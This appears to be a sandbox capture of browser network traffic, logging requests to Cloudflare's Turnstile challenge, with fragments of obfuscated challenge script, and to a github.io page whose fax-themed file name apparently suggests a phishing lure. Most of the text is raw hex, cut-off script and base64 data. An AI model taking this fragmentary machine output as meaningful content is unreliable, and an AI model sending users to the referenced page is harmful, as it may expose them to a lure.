2024-09-25 16:44:37 UTC	301	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 16:44:37 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 122459 Connection: close cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Server: cloudflare CF-RAY: 8c8c7add1b52c35a-EWR
2024-09-25 16:44:37 UTC	1068	IN	Data Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 5a 4a 79 54 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qZJyT2={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"http
2024-09-25 16:44:37 UTC	1369	IN	Data Raw: 25 32 32 25 33 45 43 6c 69 63 6b 25 32 30 68 65 72 65 25 32 30 66 6f 72 25 32 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 69 6e 76 61 6c 69 64 5f 64 6f 6d 61 69 6e 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 64 6f 6d 61 69 6e 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 65 78 70 69 72 65 64 22 3a 22 45 78 70 69 72 65 64 22 2c 22 68 75 6d 61 6e 5f 62 75 74 74 6f 6e 5f 74 65 78 74 22 3a 22 56 65 72 69 66 79 25 32 30 79 6f 75 25 32 30 61 72 65 25 32 30 68 75 6d 61 6e 22 2c 22 74 75 72 6e 73 74 69 6c Data Ascii: %22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_expired":"Expired","human_button_text":"Verify%20you%20are%20human","turnstil
2024-09-25 16:44:37 UTC	1369	IN	Data Raw: 73 65 49 6e 74 28 67 48 28 37 39 36 29 29 2f 31 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 48 28 31 34 38 32 29 29 2f 31 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 48 28 31 33 31 37 29 29 2f 31 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 48 28 31 33 39 39 29 29 2f 31 34 29 2c 64 3d 3d 3d 66 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 39 35 39 35 39 35 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 49 28 31 38 32 39 29 5d 2c 65 4d 5b 67 49 28 39 35 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 67 54 2c 65 2c 68 2c 6a 2c 6b 29 7b 65 3d 28 67 54 3d 67 49 2c 7b 27 53 57 59 52 4a 27 3a 67 54 28 35 34 32 29 Data Ascii: seInt(gH(796))/11(-parseInt(gH(1482))/12)+-parseInt(gH(1317))/13(-parseInt(gH(1399))/14),d===f)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,959595),eM=this\|\|self,eN=eM[gI(1829)],eM[gI(951)]=function(c,gT,e,h,j,k){e=(gT=gI,{'SWYRJ':gT(542)
2024-09-25 16:44:37 UTC	1369	IN	Data Raw: 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 74 6d 74 4f 66 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 2c 27 46 52 55 6f 4b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 41 63 6a 6a 42 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 67 6e 4b 43 4a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 7c 69 7d 2c 27 71 6f 53 58 46 27 3a 67 55 28 31 30 38 33 29 2c 27 43 41 65 73 4a 27 3a 67 55 28 35 38 36 29 2c 27 65 79 66 74 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 6f 74 4c 4f 77 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 Data Ascii: unction(h,i){return h==i},'tmtOf':function(h,i){return h+i},'FRUoK':function(h,i){return h<i},'AcjjB':function(h,i){return h>i},'gnKCJ':function(h,i){return h\|i},'qoSXF':gU(1083),'CAesJ':gU(586),'eyftz':function(h,i){return h<i},'otLOw':function(h,i){retu
2024-09-25 16:44:37 UTC	1369	IN	Data Raw: 74 69 6f 6e 28 69 2c 67 57 29 7b 72 65 74 75 72 6e 20 67 57 3d 67 56 2c 67 57 28 34 30 33 29 5b 67 57 28 36 37 39 29 5d 28 69 29 7d 29 7d 2c 27 67 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 67 59 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 52 2c 53 2c 4c 2c 4d 2c 4e 2c 51 29 7b 69 66 28 67 59 3d 67 55 2c 73 3d 7b 27 51 6c 52 45 63 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 2c 51 2c 52 2c 67 58 29 7b 72 65 74 75 72 6e 20 67 58 3d 62 2c 64 5b 67 58 28 31 30 37 32 29 5d 28 4f 2c 50 2c 51 2c 52 29 7d 2c 27 47 6b 45 7a 63 27 3a 67 59 28 31 30 34 32 29 2c 27 55 49 6b 69 77 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 29 7b 72 65 74 75 72 6e 20 4f 3d 3d 3d 50 7d 2c 27 41 6c 5a 6d 4d 27 3a 67 59 28 37 30 39 29 2c 27 63 52 42 66 Data Ascii: tion(i,gW){return gW=gV,gW(403)[gW(679)](i)})},'g':function(i,j,o,gY,s,x,B,C,D,E,F,G,H,I,J,K,R,S,L,M,N,Q){if(gY=gU,s={'QlREc':function(O,P,Q,R,gX){return gX=b,d[gX(1072)](O,P,Q,R)},'GkEzc':gY(1042),'UIkiw':function(O,P){return O===P},'AlZmM':gY(709),'cRBf
2024-09-25 16:44:37 UTC	1369	IN	Data Raw: 3d 46 2b 2b 2c 53 74 72 69 6e 67 28 4c 29 29 7d 69 66 28 44 21 3d 3d 27 27 29 7b 69 66 28 4f 62 6a 65 63 74 5b 67 59 28 35 30 37 29 5d 5b 67 59 28 31 30 33 30 29 5d 5b 67 59 28 38 37 38 29 5d 28 43 2c 44 29 29 7b 69 66 28 32 35 36 3e 44 5b 67 59 28 31 38 34 38 29 5d 28 30 29 29 7b 66 6f 72 28 78 3d 30 3b 64 5b 67 59 28 31 37 33 38 29 5d 28 78 2c 47 29 3b 49 3c 3c 3d 31 2c 64 5b 67 59 28 31 34 33 30 29 5d 28 4a 2c 64 5b 67 59 28 35 31 30 29 5d 28 6a 2c 31 29 29 3f 28 4a 3d 30 2c 48 5b 67 59 28 31 36 30 33 29 5d 28 64 5b 67 59 28 37 30 30 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 78 2b 2b 29 3b 66 6f 72 28 4e 3d 44 5b 67 59 28 31 38 34 38 29 5d 28 30 29 2c 78 3d 30 3b 64 5b 67 59 28 31 34 30 36 29 5d 28 38 2c 78 29 3b 49 3d 49 3c 3c 31 2e 30 36 Data Ascii: =F++,String(L))}if(D!==''){if(Object[gY(507)][gY(1030)][gY(878)](C,D)){if(256>D[gY(1848)](0)){for(x=0;d[gY(1738)](x,G);I<<=1,d[gY(1430)](J,d[gY(510)](j,1))?(J=0,H[gY(1603)](d[gY(700)](o,I)),I=0):J++,x++);for(N=D[gY(1848)](0),x=0;d[gY(1406)](8,x);I=I<<1.06
2024-09-25 16:44:37 UTC	1369	IN	Data Raw: 36 27 3a 73 5b 67 59 28 39 33 30 29 5d 28 4a 5b 67 59 28 31 34 39 30 29 5d 2c 67 59 28 31 33 35 37 29 29 26 26 51 5b 67 59 28 39 38 30 29 5d 2b 2b 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 37 27 3a 4c 5b 67 59 28 31 34 39 30 29 5d 3d 3d 3d 73 5b 67 59 28 36 35 33 29 5d 26 26 51 5b 67 59 28 31 33 30 35 29 5d 2b 2b 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 38 27 3a 4b 5b 67 59 28 31 34 39 30 29 5d 3d 3d 3d 73 5b 67 59 28 31 34 34 38 29 5d 26 26 51 5b 67 59 28 31 35 38 37 29 5d 2b 2b 3b 63 6f 6e 74 69 6e 75 65 7d 62 72 65 61 6b 7d 7d 7d 65 6c 73 65 20 4a 2b 2b 3b 72 65 74 75 72 6e 20 48 5b 67 59 28 31 37 34 32 29 5d 28 27 27 29 7d 65 6c 73 65 20 52 3d 7b 7d 2c 52 5b 67 59 28 31 32 32 30 29 5d 3d 67 59 28 31 37 39 34 29 2c 53 3d 52 2c 64 5b 67 59 28 34 Data Ascii: 6':s[gY(930)](J[gY(1490)],gY(1357))&&Q[gY(980)]++;continue;case'7':L[gY(1490)]===s[gY(653)]&&Q[gY(1305)]++;continue;case'8':K[gY(1490)]===s[gY(1448)]&&Q[gY(1587)]++;continue}break}}}else J++;return H[gY(1742)]('')}else R={},R[gY(1220)]=gY(1794),S=R,d[gY(4
2024-09-25 16:44:37 UTC	1369	IN	Data Raw: 31 38 29 5d 5b 68 33 28 31 35 35 31 29 5d 2c 54 5b 68 33 28 35 35 32 29 5d 3d 68 33 28 31 33 38 34 29 2c 54 5b 68 33 28 31 32 37 37 29 5d 3d 61 31 5b 68 33 28 31 35 31 38 29 5d 5b 68 33 28 37 33 32 29 5d 2c 54 5b 68 33 28 31 30 37 35 29 5d 3d 61 32 5b 68 33 28 31 35 31 38 29 5d 5b 68 33 28 31 35 34 38 29 5d 2c 54 5b 68 33 28 31 36 34 35 29 5d 3d 61 33 2c 59 5b 68 33 28 31 37 39 34 29 5d 5b 68 33 28 31 37 30 38 29 5d 28 54 2c 27 2a 27 29 29 3b 63 6f 6e 74 69 6e 75 65 7d 62 72 65 61 6b 7d 7d 65 6c 73 65 20 66 6f 72 28 4c 3d 64 5b 68 33 28 37 35 36 29 5d 5b 68 33 28 31 38 30 37 29 5d 28 27 7c 27 29 2c 4d 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 4c 5b 4d 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 4a 7c 3d 28 30 3c 4e 3f 31 3a 30 29 2a 46 3b 63 6f 6e 74 Data Ascii: 18)][h3(1551)],T[h3(552)]=h3(1384),T[h3(1277)]=a1[h3(1518)][h3(732)],T[h3(1075)]=a2[h3(1518)][h3(1548)],T[h3(1645)]=a3,Y[h3(1794)][h3(1708)](T,''));continue}break}}else for(L=d[h3(756)][h3(1807)]('\|'),M=0;!![];){switch(L[M++]){case'0':J\|=(0<N?1:0)F;cont
2024-09-25 16:44:37 UTC	1369	IN	Data Raw: 29 2c 43 2b 2b 29 2c 73 5b 4f 5d 29 4f 3d 73 5b 4f 5d 3b 65 6c 73 65 20 69 66 28 4f 3d 3d 3d 42 29 4f 3d 64 5b 68 33 28 31 37 34 35 29 5d 28 45 2c 45 5b 68 33 28 36 37 39 29 5d 28 30 29 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 44 5b 68 33 28 31 36 30 33 29 5d 28 4f 29 2c 73 5b 42 2b 2b 5d 3d 64 5b 68 33 28 31 37 34 35 29 5d 28 45 2c 4f 5b 68 33 28 36 37 39 29 5d 28 30 29 29 2c 78 2d 2d 2c 45 3d 4f 2c 78 3d 3d 30 26 26 28 78 3d 4d 61 74 68 5b 68 33 28 31 37 33 37 29 5d 28 32 2c 43 29 2c 43 2b 2b 29 7d 7d 65 6c 73 65 7b 66 6f 72 28 52 3d 64 5b 68 33 28 31 33 36 38 29 5d 28 74 68 69 73 2e 68 5b 31 36 33 5e 74 68 69 73 2e 67 5d 5b 33 5d 2c 64 5b 68 33 28 31 37 34 35 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 31 36 33 2e 38 37 5d 5b 31 Data Ascii: ),C++),s[O])O=s[O];else if(O===B)O=d[h3(1745)](E,E[h3(679)](0));else return null;D[h3(1603)](O),s[B++]=d[h3(1745)](E,O[h3(679)](0)),x--,E=O,x==0&&(x=Math[h3(1737)](2,C),C++)}}else{for(R=d[h3(1368)](this.h[163^this.g][3],d[h3(1745)](this.h[this.g^163.87][1
2024-09-25 16:44:37 UTC	1369	IN	Data Raw: 65 4d 5b 68 45 28 31 35 32 39 29 5d 28 66 29 2c 6b 3d 5b 5d 2c 69 3d 2d 31 3b 21 69 73 4e 61 4e 28 6d 3d 66 5b 68 45 28 31 38 34 38 29 5d 28 2b 2b 69 29 29 3b 6b 5b 68 45 28 31 36 30 33 29 5d 28 53 74 72 69 6e 67 5b 68 45 28 39 38 32 29 5d 28 28 68 5b 68 45 28 38 32 38 29 5d 28 6d 2c 32 35 35 29 2d 6a 2d 69 25 36 35 35 33 35 2b 36 35 35 33 35 29 25 32 35 35 29 29 29 3b 72 65 74 75 72 6e 20 6b 5b 68 45 28 31 37 34 32 29 5d 28 27 27 29 7d 2c 66 6d 3d 7b 7d 2c 66 6d 5b 67 49 28 39 39 34 29 5d 3d 27 6f 27 2c 66 6d 5b 67 49 28 35 37 32 29 5d 3d 27 73 27 2c 66 6d 5b 67 49 28 37 38 31 29 5d 3d 27 75 27 2c 66 6d 5b 67 49 28 31 35 33 32 29 5d 3d 27 7a 27 2c 66 6d 5b 67 49 28 31 33 31 38 29 5d 3d 27 6e 27 2c 66 6d 5b 67 49 28 31 37 37 35 29 5d 3d 27 49 27 2c 66 6e Data Ascii: eM[hE(1529)](f),k=[],i=-1;!isNaN(m=f[hE(1848)](++i));k[hE(1603)](String[hE(982)]((h[hE(828)](m,255)-j-i%65535+65535)%255)));return k[hE(1742)]('')},fm={},fm[gI(994)]='o',fm[gI(572)]='s',fm[gI(781)]='u',fm[gI(1532)]='z',fm[gI(1318)]='n',fm[gI(1775)]='I',fn

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:44:37 UTC	795	OUT	GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/5renj/0x4AAAAAAAktEy218PeM5fmO/auto/fbE/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-09-25 16:44:37 UTC	210	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 16:44:37 GMT Content-Type: image/png Content-Length: 61 Connection: close cache-control: max-age=2629800, public Server: cloudflare CF-RAY: 8c8c7adeae2d42ad-EWR
2024-09-25 16:44:37 UTC	61	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDRsIDAT$IENDB`

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:44:37 UTC	620	OUT	GET /favicon.ico HTTP/1.1 Host: maveuve.github.io Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://maveuve.github.io/frlpodf/marynewreleasefax.html Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-09-25 16:44:37 UTC	633	IN	HTTP/1.1 404 Not Found Connection: close Content-Length: 9115 Server: GitHub.com Content-Type: text/html; charset=utf-8 permissions-policy: interest-cohort=() ETag: "66f42b03-239b" Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self' X-GitHub-Request-Id: B0A8:16FC:DF5CDC:F64E2A:66F43DF5 Accept-Ranges: bytes Age: 0 Date: Wed, 25 Sep 2024 16:44:37 GMT Via: 1.1 varnish X-Served-By: cache-nyc-kteb1890089-NYC X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1727282678.712256,VS0,VE12 Vary: Accept-Encoding X-Fastly-Request-ID: 4df56139da6771a9ee33d896ba1a2d7a1a250114
2024-09-25 16:44:37 UTC	1378	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 73 74 79 6c 65 2d 73 72 63 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 3b 20 69 6d 67 2d 73 72 63 20 64 61 74 61 3a 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Content-Security-Policy" content="default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'"> <title>S
2024-09-25 16:44:37 UTC	1378	IN	Data Raw: 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 20 32 29 2c 0a 20 20 20 20 20 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 31 39 32 64 70 69 29 2c 0a 20 20 20 20 20 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 32 64 70 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 6c 6f 67 6f 2d 69 6d 67 2d 31 78 20 7b 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 20 7d 0a 20 20 20 20 20 20 20 20 2e 6c 6f 67 6f 2d 69 6d 67 2d 32 78 20 7b 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 20 7d 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 23 73 75 Data Ascii: ice-pixel-ratio: 2), only screen and ( min-resolution: 192dpi), only screen and ( min-resolution: 2dppx) { .logo-img-1x { display: none; } .logo-img-2x { display: inline-block; } } #su
2024-09-25 16:44:37 UTC	1378	IN	Data Raw: 78 34 4f 6e 68 74 63 47 31 6c 64 47 45 67 65 47 31 73 62 6e 4d 36 65 44 30 69 59 57 52 76 59 6d 55 36 62 6e 4d 36 62 57 56 30 59 53 38 69 49 48 67 36 65 47 31 77 64 47 73 39 49 6b 46 6b 62 32 4a 6c 49 46 68 4e 55 43 42 44 62 33 4a 6c 49 44 55 75 4d 79 31 6a 4d 44 45 78 49 44 59 32 4c 6a 45 30 4e 54 59 32 4d 53 77 67 4d 6a 41 78 4d 69 38 77 4d 69 38 77 4e 69 30 78 4e 44 6f 31 4e 6a 6f 79 4e 79 41 67 49 43 41 67 49 43 41 67 49 6a 34 67 50 48 4a 6b 5a 6a 70 53 52 45 59 67 65 47 31 73 62 6e 4d 36 63 6d 52 6d 50 53 4a 6f 64 48 52 77 4f 69 38 76 64 33 64 33 4c 6e 63 7a 4c 6d 39 79 5a 79 38 78 4f 54 6b 35 4c 7a 41 79 4c 7a 49 79 4c 58 4a 6b 5a 69 31 7a 65 57 35 30 59 58 67 74 62 6e 4d 6a 49 6a 34 67 50 48 4a 6b 5a 6a 70 45 5a 58 4e 6a 63 6d 6c 77 64 47 6c 76 62 Data Ascii: x4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMy1jMDExIDY2LjE0NTY2MSwgMjAxMi8wMi8wNi0xNDo1NjoyNyAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvb
2024-09-25 16:44:37 UTC	1378	IN	Data Raw: 45 39 46 4e 72 67 77 42 43 4c 69 72 4d 46 56 39 4f 6b 68 35 65 66 6c 46 68 38 50 52 35 6e 4b 35 6e 44 61 62 72 52 32 42 4e 4a 6c 4b 4f 30 54 33 35 2b 4c 69 34 6e 34 2b 2f 4a 2b 2f 4a 51 43 78 68 6d 75 35 68 33 75 4a 6f 58 4e 48 50 62 6d 57 5a 41 48 4d 73 68 57 42 38 6c 35 2f 69 70 71 61 6d 6d 61 41 66 30 7a 50 44 44 78 31 4f 4e 56 33 76 75 72 64 69 64 71 77 41 51 4c 2b 70 45 63 38 73 4c 63 41 65 31 43 43 76 51 33 59 48 78 49 57 38 50 6c 38 35 78 53 57 4e 43 31 68 41 44 44 49 76 30 72 49 45 2f 6f 34 4a 30 6b 33 6b 77 77 34 78 53 6c 77 49 68 63 71 33 45 46 46 4f 6d 37 4b 4e 2f 68 55 47 4f 51 6b 74 30 43 46 61 35 57 70 4e 4a 6c 4d 76 78 42 45 7a 2f 49 56 51 41 78 67 2f 5a 52 5a 6c 39 77 69 48 41 36 33 79 44 59 69 65 4d 37 44 6e 4c 50 35 43 69 41 47 73 43 37 Data Ascii: E9FNrgwBCLirMFV9Okh5eflFh8PR5nK5nDabrR2BNJlKO0T35+Li4n4+/J+/JQCxhmu5h3uJoXNHPbmWZAHMshWB8l5/ipqammaAf0zPDDx1ONV3vurdidqwAQL+pEc8sLcAe1CCvQ3YHxIW8Pl85xSWNC1hADDIv0rIE/o4J0k3kww4xSlwIhcq3EFFOm7KN/hUGOQkt0CFa5WpNJlMvxBEz/IVQAxg/ZRZl9wiHA63yDYieM7DnLP5CiAGsC7
2024-09-25 16:44:37 UTC	1378	IN	Data Raw: 62 32 4a 6c 49 46 68 4e 55 43 42 44 62 33 4a 6c 49 44 55 75 4d 79 31 6a 4d 44 45 78 49 44 59 32 4c 6a 45 30 4e 54 59 32 4d 53 77 67 4d 6a 41 78 4d 69 38 77 4d 69 38 77 4e 69 30 78 4e 44 6f 31 4e 6a 6f 79 4e 79 41 67 49 43 41 67 49 43 41 67 49 6a 34 67 50 48 4a 6b 5a 6a 70 53 52 45 59 67 65 47 31 73 62 6e 4d 36 63 6d 52 6d 50 53 4a 6f 64 48 52 77 4f 69 38 76 64 33 64 33 4c 6e 63 7a 4c 6d 39 79 5a 79 38 78 4f 54 6b 35 4c 7a 41 79 4c 7a 49 79 4c 58 4a 6b 5a 69 31 7a 65 57 35 30 59 58 67 74 62 6e 4d 6a 49 6a 34 67 50 48 4a 6b 5a 6a 70 45 5a 58 4e 6a 63 6d 6c 77 64 47 6c 76 62 69 42 79 5a 47 59 36 59 57 4a 76 64 58 51 39 49 69 49 67 65 47 31 73 62 6e 4d 36 65 47 31 77 50 53 4a 6f 64 48 52 77 4f 69 38 76 62 6e 4d 75 59 57 52 76 59 6d 55 75 59 32 39 74 4c 33 68 Data Ascii: b2JlIFhNUCBDb3JlIDUuMy1jMDExIDY2LjE0NTY2MSwgMjAxMi8wMi8wNi0xNDo1NjoyNyAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3h
2024-09-25 16:44:37 UTC	1378	IN	Data Raw: 74 34 32 66 2b 4d 70 30 79 55 54 56 51 62 64 57 73 41 48 56 73 69 6b 64 69 48 6b 48 61 50 78 63 51 58 51 75 66 58 67 55 42 67 4d 52 78 6d 65 39 55 30 41 41 78 66 48 34 76 46 76 6a 4d 37 65 46 36 55 6b 62 4a 53 35 71 6f 51 77 45 51 47 41 35 37 41 63 35 4a 6c 6c 46 79 55 56 5a 5a 35 63 6b 55 45 67 4d 56 78 73 4b 32 6a 6c 53 59 7a 49 2b 51 58 4a 73 69 79 6a 7a 4e 45 41 4a 79 4a 41 7a 62 2f 4b 51 61 34 31 6a 4a 4b 4c 38 70 4f 44 4d 51 69 54 45 41 79 6d 58 77 35 6e 38 2f 50 30 49 6a 44 33 62 68 37 52 67 6f 67 35 39 61 61 6e 78 69 49 52 54 56 76 56 2f 6f 6a 30 74 6e 48 63 61 2f 57 4d 72 56 77 4f 44 77 42 33 72 61 54 47 78 7a 6b 42 67 2f 67 6e 5a 56 61 70 46 56 36 32 57 79 32 6e 35 41 4f 37 30 48 4d 2f 35 77 62 4a 30 51 6e 58 79 51 53 61 56 50 44 49 75 4e 5a 7a Data Ascii: t42f+Mp0yUTVQbdWsAHVsikdiHkHaPxcQXQufXgUBgMRxme9U0AAxfH4vFvjM7eF6UkbJS5qoQwEQGA57Ac5JllFyUVZZ5ckUEgMVxsK2jlSYzI+QXJsiyjzNEAJyJAzb/KQa41jJKL8pODMQiTEAymXw5n8/P0IjD3bh7Rgog59aanxiIRTVvV/oj0tnHca/WMrVwODwB3raTGxzkBg/gnZVapFV62Wy2n5AO70HM/5wbJ0QnXyQSaVPDIuNZz
